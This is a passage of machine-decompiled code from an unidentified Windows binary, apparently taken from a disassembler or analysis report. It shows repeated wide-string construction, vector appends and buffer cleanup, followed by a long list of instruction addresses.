                          				if(_t922 >= 8) {
                          					_push(2 + _t922 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1415 = _t1415 + 8;
                          				}
                          				_v172 = 0;
                          				_v188 = 0;
                          				_t924 = _v196;
                          				_v168 = 7;
                          				if(_t924 >= 8) {
                          					_push(2 + _t924 * 2);
                          					E012F56A0(_t1164, _t1387, _v216);
                          					_t1415 = _t1415 + 8;
                          				}
                          				_v200 = 0;
                          				_v216 = 0;
                          				_t926 = _v252;
                          				_v196 = 7;
                          				if(_t926 >= 8) {
                          					_push(2 + _t926 * 2);
                          					E012F56A0(_t1164, _t1387, _v272);
                          					_t1415 = _t1415 + 8;
                          				}
                          				_v256 = 0;
                          				_v272 = 0;
                          				_t928 = _v144;
                          				_v252 = 7;
                          				if(_t928 >= 8) {
                          					_push(2 + _t928 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1415 = _t1415 + 8;
                          				}
                          				_v8 = 8;
                          				_v164 = 0;
                          				_t930 = _v220;
                          				_v148 = 0;
                          				_v144 = 7;
                          				_t1478 = _t930 - 8;
                          				if(_t930 >= 8) {
                          					_push(2 + _t930 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          					_t1415 = _t1415 + 8;
                          				}
                          				_t1397 = E012F93F0( &_v240, 0x13a5e74, _t1387, _t1478);
                          				_v8 = 0x30;
                          				_t932 = E012F93F0( &_v188, 0x13a5bec, _t1387, _t1478);
                          				_v8 = 0x31;
                          				_t933 = E0130A920(_t1164,  &_v140, _t932, _t1387);
                          				_v8 = 0x32;
                          				_t934 = E012FC470( &_v164, _t933, _t931);
                          				_t1416 = _t1415 + 4;
                          				_t1244 = _t934;
                          				_v8 = 0x33;
                          				_t935 = _v192;
                          				_t1355 =  *((intOrPtr*)(_t935 + 0x34));
                          				if(_t1355 ==  *((intOrPtr*)(_t935 + 0x38))) {
                          					_push(_t1244);
                          					E012F54C0(_t1164, _t935 + 0x30, _t1387, _t1397, _t1355);
                          				} else {
                          					 *((intOrPtr*)(_t1355 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1355 + 0x14)) = 0;
                          					asm("movups xmm0, [ecx]");
                          					asm("movups [edx], xmm0");
                          					asm("movq xmm0, [ecx+0x10]");
                          					asm("movq [edx+0x10], xmm0");
                          					 *((intOrPtr*)(_t1244 + 0x10)) = 0;
                          					 *(_t1244 + 0x14) = 7;
                          					 *_t1244 = 0;
                          					 *((intOrPtr*)(_t935 + 0x34)) =  *((intOrPtr*)(_t935 + 0x34)) + 0x18;
                          				}
                          				_t937 = _v144;
                          				if(_t937 >= 8) {
                          					_push(2 + _t937 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1416 = _t1416 + 8;
                          				}
                          				_v148 = 0;
                          				_v164 = 0;
                          				_t939 = _v120;
                          				_v144 = 7;
                          				if(_t939 >= 8) {
                          					_push(2 + _t939 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1416 = _t1416 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t941 = _v168;
                          				_v120 = 7;
                          				if(_t941 >= 8) {
                          					_push(2 + _t941 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1416 = _t1416 + 8;
                          				}
                          				_v8 = 8;
                          				_v188 = 0;
                          				_t943 = _v220;
                          				_v172 = 0;
                          				_v168 = 7;
                          				_t1483 = _t943 - 8;
                          				if(_t943 >= 8) {
                          					_push(2 + _t943 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          					_t1416 = _t1416 + 8;
                          				}
                          				_t1398 = E012F93F0( &_v240, 0x13a5b8c, _t1387, _t1483);
                          				_v8 = 0x34;
                          				_t945 = E012F93F0( &_v188, 0x13a5bec, _t1387, _t1483);
                          				_v8 = 0x35;
                          				_t946 = E0130A920(_t1164,  &_v140, _t945, _t1387); // executed
                          				_v8 = 0x36;
                          				_t947 = E012FC470( &_v164, _t946, _t944);
                          				_t1417 = _t1416 + 4;
                          				_t1250 = _t947;
                          				_v8 = 0x37;
                          				_t948 = _v192;
                          				_t1360 =  *((intOrPtr*)(_t948 + 0x34));
                          				if(_t1360 ==  *((intOrPtr*)(_t948 + 0x38))) {
                          					_push(_t1250);
                          					E012F54C0(_t1164, _t948 + 0x30, _t1387, _t1398, _t1360);
                          				} else {
                          					 *((intOrPtr*)(_t1360 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1360 + 0x14)) = 0;
                          					asm("movups xmm0, [ecx]");
                          					asm("movups [edx], xmm0");
                          					asm("movq xmm0, [ecx+0x10]");
                          					asm("movq [edx+0x10], xmm0");
                          					 *((intOrPtr*)(_t1250 + 0x10)) = 0;
                          					 *(_t1250 + 0x14) = 7;
                          					 *_t1250 = 0;
                          					 *((intOrPtr*)(_t948 + 0x34)) =  *((intOrPtr*)(_t948 + 0x34)) + 0x18;
                          				}
                          				_t950 = _v144;
                          				if(_t950 >= 8) {
                          					_push(2 + _t950 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1417 = _t1417 + 8;
                          				}
                          				_v148 = 0;
                          				_v164 = 0;
                          				_t952 = _v120;
                          				_v144 = 7;
                          				if(_t952 >= 8) {
                          					_push(2 + _t952 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1417 = _t1417 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t954 = _v168;
                          				_v120 = 7;
                          				if(_t954 >= 8) {
                          					_push(2 + _t954 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1417 = _t1417 + 8;
                          				}
                          				_v8 = 8;
                          				_v188 = 0;
                          				_t956 = _v220;
                          				_v172 = 0;
                          				_v168 = 7;
                          				_t1488 = _t956 - 8;
                          				if(_t956 >= 8) {
                          					_push(2 + _t956 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          					_t1417 = _t1417 + 8;
                          				}
                          				_t1399 = E012F93F0( &_v240, 0x13a5bd4, _t1387, _t1488);
                          				_v8 = 0x38;
                          				_t958 = E012F93F0( &_v188, 0x13a5bec, _t1387, _t1488);
                          				_v8 = 0x39;
                          				_t959 = E0130A920(_t1164,  &_v140, _t958, _t1387);
                          				_v8 = 0x3a;
                          				_t960 = E012FC470( &_v164, _t959, _t957);
                          				_t1418 = _t1417 + 4;
                          				_t1256 = _t960;
                          				_v8 = 0x3b;
                          				_t961 = _v192;
                          				_t1365 =  *((intOrPtr*)(_t961 + 0x34));
                          				if(_t1365 ==  *((intOrPtr*)(_t961 + 0x38))) {
                          					_push(_t1256);
                          					E012F54C0(_t1164, _t961 + 0x30, _t1387, _t1399, _t1365);
                          				} else {
                          					 *((intOrPtr*)(_t1365 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1365 + 0x14)) = 0;
                          					asm("movups xmm0, [ecx]");
                          					asm("movups [edx], xmm0");
                          					asm("movq xmm0, [ecx+0x10]");
                          					asm("movq [edx+0x10], xmm0");
                          					 *((intOrPtr*)(_t1256 + 0x10)) = 0;
                          					 *(_t1256 + 0x14) = 7;
                          					 *_t1256 = 0;
                          					 *((intOrPtr*)(_t961 + 0x34)) =  *((intOrPtr*)(_t961 + 0x34)) + 0x18;
                          				}
                          				_t963 = _v144;
                          				if(_t963 >= 8) {
                          					_push(2 + _t963 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1418 = _t1418 + 8;
                          				}
                          				_v148 = 0;
                          				_v164 = 0;
                          				_t965 = _v120;
                          				_v144 = 7;
                          				if(_t965 >= 8) {
                          					_push(2 + _t965 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1418 = _t1418 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t967 = _v168;
                          				_v120 = 7;
                          				if(_t967 >= 8) {
                          					_push(2 + _t967 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1418 = _t1418 + 8;
                          				}
                          				_v8 = 8;
                          				_v188 = 0;
                          				_t969 = _v220;
                          				_v172 = 0;
                          				_v168 = 7;
                          				_t1493 = _t969 - 8;
                          				if(_t969 >= 8) {
                          					_push(2 + _t969 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          					_t1418 = _t1418 + 8;
                          				}
                          				_t1400 = E012F93F0( &_v240, 0x13a5f4c, _t1387, _t1493);
                          				_v8 = 0x3c;
                          				_t971 = E012F93F0( &_v188, 0x13a5bec, _t1387, _t1493);
                          				_v8 = 0x3d;
                          				_t972 = E0130A920(_t1164,  &_v140, _t971, _t1387);
                          				_v8 = 0x3e;
                          				_t973 = E012FC470( &_v164, _t972, _t970);
                          				_t1419 = _t1418 + 4;
                          				_t1262 = _t973;
                          				_v8 = 0x3f;
                          				_t974 = _v192;
                          				_t1370 =  *((intOrPtr*)(_t974 + 0x34));
                          				if(_t1370 ==  *((intOrPtr*)(_t974 + 0x38))) {
                          					_push(_t1262);
                          					E012F54C0(_t1164, _t974 + 0x30, _t1387, _t1400, _t1370);
                          				} else {
                          					 *((intOrPtr*)(_t1370 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1370 + 0x14)) = 0;
                          					asm("movups xmm0, [ecx]");
                          					asm("movups [edx], xmm0");
                          					asm("movq xmm0, [ecx+0x10]");
                          					asm("movq [edx+0x10], xmm0");
                          					 *((intOrPtr*)(_t1262 + 0x10)) = 0;
                          					 *(_t1262 + 0x14) = 7;
                          					 *_t1262 = 0;
                          					 *((intOrPtr*)(_t974 + 0x34)) =  *((intOrPtr*)(_t974 + 0x34)) + 0x18;
                          				}
                          				_t976 = _v144;
                          				if(_t976 >= 8) {
                          					_push(2 + _t976 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1419 = _t1419 + 8;
                          				}
                          				_v148 = 0;
                          				_v164 = 0;
                          				_t978 = _v120;
                          				_v144 = 7;
                          				if(_t978 >= 8) {
                          					_push(2 + _t978 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1419 = _t1419 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t980 = _v168;
                          				_v120 = 7;
                          				if(_t980 >= 8) {
                          					_push(2 + _t980 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1419 = _t1419 + 8;
                          				}
                          				_v8 = 8;
                          				_v188 = 0;
                          				_t982 = _v220;
                          				_v172 = 0;
                          				_v168 = 7;
                          				_t1498 = _t982 - 8;
                          				if(_t982 >= 8) {
                          					_push(2 + _t982 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          					_t1419 = _t1419 + 8;
                          				}
                          				_t1401 = E012F93F0( &_v240, 0x13a5ff4, _t1387, _t1498);
                          				_v8 = 0x40;
                          				_t984 = E012F93F0( &_v188, 0x13a5bec, _t1387, _t1498);
                          				_v8 = 0x41;
                          				_t985 = E0130A920(_t1164,  &_v140, _t984, _t1387);
                          				_v8 = 0x42;
                          				_t986 = E012FC470( &_v164, _t985, _t983);
                          				_t1420 = _t1419 + 4;
                          				_t1268 = _t986;
                          				_v8 = 0x43;
                          				_t987 = _v192;
                          				_t1375 =  *((intOrPtr*)(_t987 + 0x34));
                          				if(_t1375 ==  *((intOrPtr*)(_t987 + 0x38))) {
                          					_push(_t1268);
                          					E012F54C0(_t1164, _t987 + 0x30, _t1387, _t1401, _t1375);
                          				} else {
                          					 *((intOrPtr*)(_t1375 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1375 + 0x14)) = 0;
                          					asm("movups xmm0, [ecx]");
                          					asm("movups [edx], xmm0");
                          					asm("movq xmm0, [ecx+0x10]");
                          					asm("movq [edx+0x10], xmm0");
                          					 *((intOrPtr*)(_t1268 + 0x10)) = 0;
                          					 *(_t1268 + 0x14) = 7;
                          					 *_t1268 = 0;
                          					 *((intOrPtr*)(_t987 + 0x34)) =  *((intOrPtr*)(_t987 + 0x34)) + 0x18;
                          				}
                          				_t989 = _v144;
                          				if(_t989 >= 8) {
                          					_push(2 + _t989 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1420 = _t1420 + 8;
                          				}
                          				_v148 = 0;
                          				_v164 = 0;
                          				_t991 = _v120;
                          				_v144 = 7;
                          				if(_t991 >= 8) {
                          					_push(2 + _t991 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1420 = _t1420 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t993 = _v168;
                          				_v120 = 7;
                          				if(_t993 >= 8) {
                          					_push(2 + _t993 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1420 = _t1420 + 8;
                          				}
                          				_v8 = 8;
                          				_v188 = 0;
                          				_t995 = _v220;
                          				_v172 = 0;
                          				_v168 = 7;
                          				_t1503 = _t995 - 8;
                          				if(_t995 >= 8) {
                          					_push(2 + _t995 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          					_t1420 = _t1420 + 8;
                          				}
                          				_t996 = E012F93F0( &_v240, 0x13a5fc4, _t1387, _t1503);
                          				_v8 = 0x44;
                          				_t997 = E012F93F0( &_v188, 0x13a5bec, _t1387, _t1503);
                          				_v8 = 0x45;
                          				_t998 = E0130A920(_t1164,  &_v140, _t997, _t1387);
                          				_v8 = 0x46;
                          				_t999 = E012FC470( &_v164, _t998, _t996);
                          				_t1421 = _t1420 + 4;
                          				_v8 = 0x47;
                          				_t1404 = _v192 + 0x30;
                          				_t1274 =  *((intOrPtr*)(_t1404 + 4));
                          				if(_t1274 ==  *((intOrPtr*)(_t1404 + 8))) {
                          					_push(_t999);
                          					E012F54C0(_t1164, _t1404, _t1387, _t1404, _t1274);
                          				} else {
                          					 *((intOrPtr*)(_t1274 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t1274 + 0x14)) = 0;
                          					asm("movups xmm0, [eax]");
                          					asm("movups [ecx], xmm0");
                          					asm("movq xmm0, [eax+0x10]");
                          					asm("movq [ecx+0x10], xmm0");
                          					 *((intOrPtr*)(_t999 + 0x10)) = 0;
                          					 *(_t999 + 0x14) = 7;
                          					 *_t999 = 0;
                          					 *((intOrPtr*)(_t1404 + 4)) =  *((intOrPtr*)(_t1404 + 4)) + 0x18;
                          				}
                          				_t1001 = _v144;
                          				if(_t1001 >= 8) {
                          					_push(2 + _t1001 * 2);
                          					E012F56A0(_t1164, _t1387, _v164);
                          					_t1421 = _t1421 + 8;
                          				}
                          				_v148 = 0;
                          				_v164 = 0;
                          				_t1003 = _v120;
                          				_v144 = 7;
                          				if(_t1003 >= 8) {
                          					_push(2 + _t1003 * 2);
                          					E012F56A0(_t1164, _t1387, _v140);
                          					_t1421 = _t1421 + 8;
                          				}
                          				_v124 = 0;
                          				_v140 = 0;
                          				_t1005 = _v168;
                          				_v120 = 7;
                          				if(_t1005 >= 8) {
                          					_push(2 + _t1005 * 2);
                          					E012F56A0(_t1164, _t1387, _v188);
                          					_t1421 = _t1421 + 8;
                          				}
                          				_v172 = 0;
                          				_v188 = 0;
                          				_t1007 = _v220;
                          				_v168 = 7;
                          				if(_t1007 >= 8) {
                          					_push(2 + _t1007 * 2);
                          					E012F56A0(_t1164, _t1387, _v240);
                          				}
                          				E0130C7C0(_t1387);
                          				E0130C7C0(_t1404);
                          				_v72 = 0;
                          				_v68 = 2;
                          				_v64 = 0xd;
                          				_v76 = 0x1396b78;
                          				_v60 = 0;
                          				_v56 = 0;
                          				_v52 = 0;
                          				_v8 = 0x48;
                          				_t1405 = _v192;
                          				E01303C70(_t1405,  &_v76);
                          				_t1277 = _t1405 + 0x3c;
                          				if(_t1405 + 0x3c !=  &_v60) {
                          					_push(_v244);
                          					E01307E90(_t1164, _t1277, _t1387, _t1405, _v60, _v56);
                          				}
                          				_v44 = 0;
                          				_v40 = 2;
                          				_v36 = 0xe;
                          				_v48 = 0x1396b68;
                          				_v32 = 0;
                          				_v28 = 0;
                          				_v24 = 0;
                          				_v8 = 0x49;
                          				E01303C70(_t1405,  &_v48);
                          				_t1279 = _t1405 + 0x48;
                          				if(_t1405 + 0x48 !=  &_v32) {
                          					_push(_v244);
                          					E01307E90(_t1164, _t1279, _t1387, _t1405, _v32, _v28);
                          				}
                          				_v112 = 0;
                          				_v108 = 2;
                          				_v104 = 0xc;
                          				_v116 = 0x1396adc;
                          				_v84 = 0;
                          				_v80 = 7;
                          				_v100 = 0;
                          				_v8 = 0x4a;
                          				E01303C70(_t1405,  &_v116);
                          				_t1019 =  &_v100;
                          				_t1281 = _t1405 + 0x54;
                          				if(_t1405 + 0x54 != _t1019) {
                          					_t1512 = _v80 - 8;
                          					_push(_v84);
                          					_t1034 =  >=  ? _v100 : _t1019;
                          					E012F51B0(_t1164, _t1281, _t1387, _t1405,  >=  ? _v100 : _t1019);
                          				}
                          				_t1020 = E012F93F0( &_v240, 0x13a5b14, _t1387, _t1512);
                          				_t1388 = _t1020;
                          				_t1283 = _t1405 + 0x6c;
                          				if(_t1283 != _t1020) {
                          					_t1029 =  *(_t1283 + 0x14);
                          					if( *(_t1283 + 0x14) >= 8) {
                          						E012F54A0( *_t1283, _t1029 + 1);
                          						_t1283 = _t1405 + 0x6c;
                          					}
                          					 *((intOrPtr*)(_t1283 + 0x10)) = 0;
                          					_v192 = 0;
                          					_push(_v192);
                          					 *(_t1283 + 0x14) = 7;
                          					 *_t1283 = 0;
                          					E012F52C0(_t1388);
                          				}
                          				E012F4F30( &_v240);
                          				 *((intOrPtr*)(_t1405 + 0x84)) = 0xffffffff;
                          				 *((intOrPtr*)(_t1405 + 0x88)) = 0;
                          				 *((intOrPtr*)(_t1405 + 0x8c)) = 0;
                          				 *((intOrPtr*)(_t1405 + 0x90)) = 0;
                          				E0130CC00(_t1405);
                          				E01308300( &_v116);
                          				E0130AC50(_t1164,  &_v48);
                          				E0130ABC0(_t1164,  &_v76);
                          				E013039F0( &_a4);
                          				 *[fs:0x0] = _v16;
                          				_pop(_t1406);
                          				return E0132EA79(_v20 ^ _t1407, _t1406);
                          			}
                          0x0130b983
                          0x0130b98a
                          0x0130b991
                          0x0130b994
                          0x0130b997
                          0x0130b99c
                          0x0130b9a3
                          0x0130b9aa
                          0x0130b9b1
                          0x0130b9b4
                          0x0130b9b4
                          0x0130b9c3
                          0x0130b9c7
                          0x0130b9cd
                          0x0130b9d0
                          0x0130b9d9
                          0x0130b9e0
                          0x0130b9e5
                          0x0130b9e5
                          0x0130b9f3
                          0x0130b9f8
                          0x0130b9fc
                          0x0130ba02
                          0x0130ba3b
                          0x0130ba3f
                          0x0130ba04
                          0x0130ba04
                          0x0130ba0b
                          0x0130ba12
                          0x0130ba15
                          0x0130ba18
                          0x0130ba1d
                          0x0130ba24
                          0x0130ba2b
                          0x0130ba32
                          0x0130ba35
                          0x0130ba35
                          0x0130ba44
                          0x0130ba48
                          0x0130ba4e
                          0x0130ba51
                          0x0130ba5a
                          0x0130ba61
                          0x0130ba66
                          0x0130ba66
                          0x0130ba74
                          0x0130ba79
                          0x0130ba7d
                          0x0130ba83
                          0x0130babc
                          0x0130bac0
                          0x0130ba85
                          0x0130ba85
                          0x0130ba8c
                          0x0130ba93
                          0x0130ba96
                          0x0130ba99
                          0x0130ba9e
                          0x0130baa5
                          0x0130baac
                          0x0130bab3
                          0x0130bab6
                          0x0130bab6
                          0x0130bac5
                          0x0130bac9
                          0x0130bacf
                          0x0130bad2
                          0x0130badb
                          0x0130bae2
                          0x0130bae7
                          0x0130bae7
                          0x0130bafa
                          0x0130bb01
                          0x0130bb0b
                          0x0130bb12
                          0x0130bb1c
                          0x0130bb28
                          0x0130bb32
                          0x0130bb3a
                          0x0130bb44
                          0x0130bb50
                          0x0130bb5a
                          0x0130bb5f
                          0x0130bb62
                          0x0130bb66
                          0x0130bb6c
                          0x0130bba5
                          0x0130bba9
                          0x0130bb6e
                          0x0130bb6e
                          0x0130bb75
                          0x0130bb7c
                          0x0130bb7f
                          0x0130bb82
                          0x0130bb87
                          0x0130bb8e
                          0x0130bb95
                          0x0130bb9c
                          0x0130bb9f
                          0x0130bb9f
                          0x0130bbae
                          0x0130bbb4
                          0x0130bbbd
                          0x0130bbc4
                          0x0130bbc9
                          0x0130bbc9
                          0x0130bbce
                          0x0130bbd5
                          0x0130bbdc
                          0x0130bbe2
                          0x0130bbec
                          0x0130bbf5
                          0x0130bbfc
                          0x0130bc01
                          0x0130bc01
                          0x0130bc06
                          0x0130bc10
                          0x0130bc17
                          0x0130bc1d
                          0x0130bc2a
                          0x0130bc33
                          0x0130bc3a
                          0x0130bc3f
                          0x0130bc3f
                          0x0130bc44
                          0x0130bc4e
                          0x0130bc55
                          0x0130bc5b
                          0x0130bc68
                          0x0130bc71
                          0x0130bc78
                          0x0130bc7d
                          0x0130bc7d
                          0x0130bc82
                          0x0130bc8c
                          0x0130bc93
                          0x0130bc99
                          0x0130bca6
                          0x0130bcaf
                          0x0130bcb6
                          0x0130bcbb
                          0x0130bcbb
                          0x0130bcc0
                          0x0130bcc4
                          0x0130bccb
                          0x0130bcd1
                          0x0130bcdb
                          0x0130bce5
                          0x0130bce8
                          0x0130bcf1
                          0x0130bcf8
                          0x0130bcfd
                          0x0130bcfd
                          0x0130bd10
                          0x0130bd17
                          0x0130bd21
                          0x0130bd28
                          0x0130bd32
                          0x0130bd3a
                          0x0130bd44
                          0x0130bd49
                          0x0130bd4c
                          0x0130bd4e
                          0x0130bd52
                          0x0130bd58
                          0x0130bd5e
                          0x0130bd97
                          0x0130bd9c
                          0x0130bd60
                          0x0130bd60
                          0x0130bd67
                          0x0130bd6e
                          0x0130bd71
                          0x0130bd74
                          0x0130bd79
                          0x0130bd80
                          0x0130bd87
                          0x0130bd8e
                          0x0130bd91
                          0x0130bd91
                          0x0130bda1
                          0x0130bdaa
                          0x0130bdb3
                          0x0130bdba
                          0x0130bdbf
                          0x0130bdbf
                          0x0130bdc4
                          0x0130bdce
                          0x0130bdd5
                          0x0130bdd8
                          0x0130bde5
                          0x0130bdee
                          0x0130bdf5
                          0x0130bdfa
                          0x0130bdfa
                          0x0130bdff
                          0x0130be06
                          0x0130be0d
                          0x0130be13
                          0x0130be1d
                          0x0130be26
                          0x0130be2d
                          0x0130be32
                          0x0130be32
                          0x0130be37
                          0x0130be3b
                          0x0130be42
                          0x0130be48
                          0x0130be52
                          0x0130be5c
                          0x0130be5f
                          0x0130be68
                          0x0130be6f
                          0x0130be74
                          0x0130be74
                          0x0130be87
                          0x0130be8e
                          0x0130be98
                          0x0130be9f
                          0x0130bea9
                          0x0130beb1
                          0x0130bebb
                          0x0130bec0
                          0x0130bec3
                          0x0130bec5
                          0x0130bec9
                          0x0130becf
                          0x0130bed5
                          0x0130bf0e
                          0x0130bf13
                          0x0130bed7
                          0x0130bed7
                          0x0130bede
                          0x0130bee5
                          0x0130bee8
                          0x0130beeb
                          0x0130bef0
                          0x0130bef7
                          0x0130befe
                          0x0130bf05
                          0x0130bf08
                          0x0130bf08
                          0x0130bf18
                          0x0130bf21
                          0x0130bf2a
                          0x0130bf31
                          0x0130bf36
                          0x0130bf36
                          0x0130bf3b
                          0x0130bf45
                          0x0130bf4c
                          0x0130bf4f
                          0x0130bf5c
                          0x0130bf65
                          0x0130bf6c
                          0x0130bf71
                          0x0130bf71
                          0x0130bf76
                          0x0130bf7d
                          0x0130bf84
                          0x0130bf8a
                          0x0130bf94
                          0x0130bf9d
                          0x0130bfa4
                          0x0130bfa9
                          0x0130bfa9
                          0x0130bfae
                          0x0130bfb2
                          0x0130bfb9
                          0x0130bfbf
                          0x0130bfc9
                          0x0130bfd3
                          0x0130bfd6
                          0x0130bfdf
                          0x0130bfe6
                          0x0130bfeb
                          0x0130bfeb
                          0x0130bffe
                          0x0130c005
                          0x0130c00f
                          0x0130c016
                          0x0130c020
                          0x0130c028
                          0x0130c032
                          0x0130c037
                          0x0130c03a
                          0x0130c03c
                          0x0130c040
                          0x0130c046
                          0x0130c04c
                          0x0130c085
                          0x0130c08a
                          0x0130c04e
                          0x0130c04e
                          0x0130c055
                          0x0130c05c
                          0x0130c05f
                          0x0130c062
                          0x0130c067
                          0x0130c06e
                          0x0130c075
                          0x0130c07c
                          0x0130c07f
                          0x0130c07f
                          0x0130c08f
                          0x0130c098
                          0x0130c0a1
                          0x0130c0a8
                          0x0130c0ad
                          0x0130c0ad
                          0x0130c0b2
                          0x0130c0bc
                          0x0130c0c3
                          0x0130c0c6
                          0x0130c0d3
                          0x0130c0dc
                          0x0130c0e3
                          0x0130c0e8
                          0x0130c0e8
                          0x0130c0ed
                          0x0130c0f4
                          0x0130c0fb
                          0x0130c101
                          0x0130c10b
                          0x0130c114
                          0x0130c11b
                          0x0130c120
                          0x0130c120
                          0x0130c125
                          0x0130c129
                          0x0130c130
                          0x0130c136
                          0x0130c140
                          0x0130c14a
                          0x0130c14d
                          0x0130c156
                          0x0130c15d
                          0x0130c162
                          0x0130c162
                          0x0130c175
                          0x0130c17c
                          0x0130c186
                          0x0130c18d
                          0x0130c197
                          0x0130c19f
                          0x0130c1a9
                          0x0130c1ae
                          0x0130c1b1
                          0x0130c1b3
                          0x0130c1b7
                          0x0130c1bd
                          0x0130c1c3
                          0x0130c1fc
                          0x0130c201
                          0x0130c1c5
                          0x0130c1c5
                          0x0130c1cc
                          0x0130c1d3
                          0x0130c1d6
                          0x0130c1d9
                          0x0130c1de
                          0x0130c1e5
                          0x0130c1ec
                          0x0130c1f3
                          0x0130c1f6
                          0x0130c1f6
                          0x0130c206
                          0x0130c20f
                          0x0130c218
                          0x0130c21f
                          0x0130c224
                          0x0130c224
                          0x0130c229
                          0x0130c233
                          0x0130c23a
                          0x0130c23d
                          0x0130c24a
                          0x0130c253
                          0x0130c25a
                          0x0130c25f
                          0x0130c25f
                          0x0130c264
                          0x0130c26b
                          0x0130c272
                          0x0130c278
                          0x0130c282
                          0x0130c28b
                          0x0130c292
                          0x0130c297
                          0x0130c297
                          0x0130c29c
                          0x0130c2a0
                          0x0130c2a7
                          0x0130c2ad
                          0x0130c2b7
                          0x0130c2c1
                          0x0130c2c4
                          0x0130c2cd
                          0x0130c2d4
                          0x0130c2d9
                          0x0130c2d9
                          0x0130c2ec
                          0x0130c2f3
                          0x0130c2fd
                          0x0130c304
                          0x0130c30e
                          0x0130c316
                          0x0130c320
                          0x0130c325
                          0x0130c328
                          0x0130c32a
                          0x0130c32e
                          0x0130c334
                          0x0130c33a
                          0x0130c373
                          0x0130c378
                          0x0130c33c
                          0x0130c33c
                          0x0130c343
                          0x0130c34a
                          0x0130c34d
                          0x0130c350
                          0x0130c355
                          0x0130c35c
                          0x0130c363
                          0x0130c36a
                          0x0130c36d
                          0x0130c36d
                          0x0130c37d
                          0x0130c386
                          0x0130c38f
                          0x0130c396
                          0x0130c39b
                          0x0130c39b
                          0x0130c3a0
                          0x0130c3aa
                          0x0130c3b1
                          0x0130c3b4
                          0x0130c3c1
                          0x0130c3ca
                          0x0130c3d1
                          0x0130c3d6
                          0x0130c3d6
                          0x0130c3db
                          0x0130c3e2
                          0x0130c3e9
                          0x0130c3ef
                          0x0130c3f9
                          0x0130c402
                          0x0130c409
                          0x0130c40e
                          0x0130c40e
                          0x0130c413
                          0x0130c417
                          0x0130c41e
                          0x0130c424
                          0x0130c42e
                          0x0130c438
                          0x0130c43b
                          0x0130c444
                          0x0130c44b
                          0x0130c450
                          0x0130c450
                          0x0130c45e
                          0x0130c46a
                          0x0130c474
                          0x0130c47b
                          0x0130c485
                          0x0130c48d
                          0x0130c497
                          0x0130c49c
                          0x0130c49f
                          0x0130c4a9
                          0x0130c4ac
                          0x0130c4b2
                          0x0130c4eb
                          0x0130c4ef
                          0x0130c4b4
                          0x0130c4b4
                          0x0130c4bb
                          0x0130c4c2
                          0x0130c4c5
                          0x0130c4c8
                          0x0130c4cd
                          0x0130c4d4
                          0x0130c4db
                          0x0130c4e2
                          0x0130c4e5
                          0x0130c4e5
                          0x0130c4f4
                          0x0130c4fd
                          0x0130c506
                          0x0130c50d
                          0x0130c512
                          0x0130c512
                          0x0130c517
                          0x0130c521
                          0x0130c528
                          0x0130c52b
                          0x0130c538
                          0x0130c541
                          0x0130c548
                          0x0130c54d
                          0x0130c54d
                          0x0130c552
                          0x0130c559
                          0x0130c560
                          0x0130c566
                          0x0130c570
                          0x0130c579
                          0x0130c580
                          0x0130c585
                          0x0130c585
                          0x0130c58a
                          0x0130c594
                          0x0130c59b
                          0x0130c5a1
                          0x0130c5ae
                          0x0130c5b7
                          0x0130c5be
                          0x0130c5c3
                          0x0130c5c7
                          0x0130c5cd
                          0x0130c5d2
                          0x0130c5d9
                          0x0130c5e0
                          0x0130c5e7
                          0x0130c5ee
                          0x0130c5f5
                          0x0130c5fc
                          0x0130c603
                          0x0130c60a
                          0x0130c613
                          0x0130c61b
                          0x0130c620
                          0x0130c622
                          0x0130c62e
                          0x0130c62e
                          0x0130c633
                          0x0130c63a
                          0x0130c641
                          0x0130c648
                          0x0130c64f
                          0x0130c656
                          0x0130c65d
                          0x0130c667
                          0x0130c66e
                          0x0130c676
                          0x0130c67b
                          0x0130c67d
                          0x0130c689
                          0x0130c689
                          0x0130c690
                          0x0130c697
                          0x0130c69e
                          0x0130c6a5
                          0x0130c6ac
                          0x0130c6b3
                          0x0130c6ba
                          0x0130c6c1
                          0x0130c6c8
                          0x0130c6cd
                          0x0130c6d0
                          0x0130c6d5
                          0x0130c6d7
                          0x0130c6db
                          0x0130c6de
                          0x0130c6e3
                          0x0130c6e3
                          0x0130c6f3
                          0x0130c6f8
                          0x0130c6fa
                          0x0130c6ff
                          0x0130c701
                          0x0130c707
                          0x0130c70d
                          0x0130c712
                          0x0130c712
                          0x0130c717
                          0x0130c71e
                          0x0130c724
                          0x0130c72a
                          0x0130c732
                          0x0130c735
